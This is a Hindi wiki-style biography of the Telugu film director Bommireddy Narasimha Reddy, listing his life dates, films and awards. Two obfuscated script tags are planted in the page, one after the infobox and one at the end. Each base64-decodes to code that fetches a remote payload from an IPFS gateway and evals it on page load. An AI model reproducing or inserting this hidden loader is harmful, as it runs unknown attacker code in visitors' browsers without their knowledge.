एक्स्प्रेशन त्रुटि: अनपेक्षित उद्गार चिन्ह "२"।

बोमिरेड्डी नरसिम्हा रेड्डी

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.
बोमिरेड्डी नरसिम्हा रेड्डी
बोमिरेड्डी नरसिम्हा रेड्डी
पूरा नाम बोमिरेड्डी नरसिम्हा रेड्डी
प्रसिद्ध नाम बी. नरसिम्हा रेड्डी
जन्म 16 नवम्बर 1908
जन्म भूमि अनन्तपुर ज़िला, आंध्र प्रदेश
मृत्यु 8 नवम्बर 1977
मृत्यु स्थान चेन्नई, तमिलनाडु
कर्म-क्षेत्र फ़िल्म निर्देशक
मुख्य फ़िल्में 'वंदे मातरम' (1939), 'मल्लीश्वरी' (1951), 'बांगरु पापा' (1954), 'राजा मकुटम' (1959)।
पुरस्कार-उपाधि 'पद्म भूषण', 'दादा साहब फाल्के पुरस्कार'
नागरिकता भारतीय
अन्य जानकारी बोमिरेड्डी नरसिम्हा रेड्डी के छोटे भाई बी. नागी रेड्डी भी प्रसिद्ध फ़िल्म निर्माता-निर्देशक थे।

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

बोमिरेड्डी नरसिम्हा रेड्डी (अंग्रेज़ी: Bommireddy Narasimha Reddy, 16 नवम्बर 1908 - मृत्यु: 8 नवम्बर 1977) तेलुगु सिनेमा के प्रसिद्ध फ़िल्म निर्देशक थे। उन्हें सिनेमा में अभूतपूर्व योगदान के लिए सन् 1974 में भारतीय सिनेमा के सर्वोच्च पुरस्कार 'दादा साहब फाल्के सम्मान' से सम्मानित किया गया था।

जीवन परिचय

बोमिरेड्डी नरसिम्हा रेड्डी का जन्म 16 नवम्बर 1908 को अनन्तपुर ज़िला, आंध्र प्रदेश में हुआ था। ये तीन (बोमिरेड्डी नरसिम्हा रेड्डी, बी. नागी रेड्डी और बी.एन. कोंडा रेड्डी) भाइयों में सबसे बड़े थे। इनके छोटे भाई बी. नागी रेड्डी भी प्रसिद्ध फ़िल्म निर्माता-निर्देशक थे।

प्रमुख फ़िल्में

बतौर निर्देशक
  • वंदे मातरम (1939)
  • सुमंगली (1940)
  • देवता (1941)
  • स्वर्ग सीमा (1945)
  • मल्लीश्वरी (1951)
  • बांगरु पापा (1954)
  • भाग्य रेखा (1957)
  • राजा मकुटम (1959)
  • पूजाफलम (1964)
  • रंगुला रतनम (1966)
  • बांगरु पंजारम (1969)
बतौर पटकथा या कहानी लेखक
  • वंदे मातरम (1939)
  • सुमंगली (1940)
  • स्वर्ग सीमा (1945)
  • बांगरु पापा (1954)
  • भाग्य रेखा (1957)
  • राजा मकुटम (1959)
बतौर निर्माता
  • गृहलक्ष्मी (1938)
  • वंदे मातरम (1939)
  • सुमंगली (1940)
  • देवता (1941)
  • स्वर्ग सीमा (1945)
  • योगी वेमना (1947)

सम्मान और पुरस्कार

  • पद्म भूषण (1974)
  • दादा साहब फाल्के पुरस्कार (1974)
  • राष्ट्रपति रजत पदक (1955) सर्वश्रेष्ठ फ़ीचर तेलुगु फ़िल्म 'बांगरु पापा' के लिए
  • इसके अतिरिक्त फ़िल्म जगत् में ये पहले व्यक्ति थे जो डी.लिट की उपाधि से सम्मानित किये गये।



पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>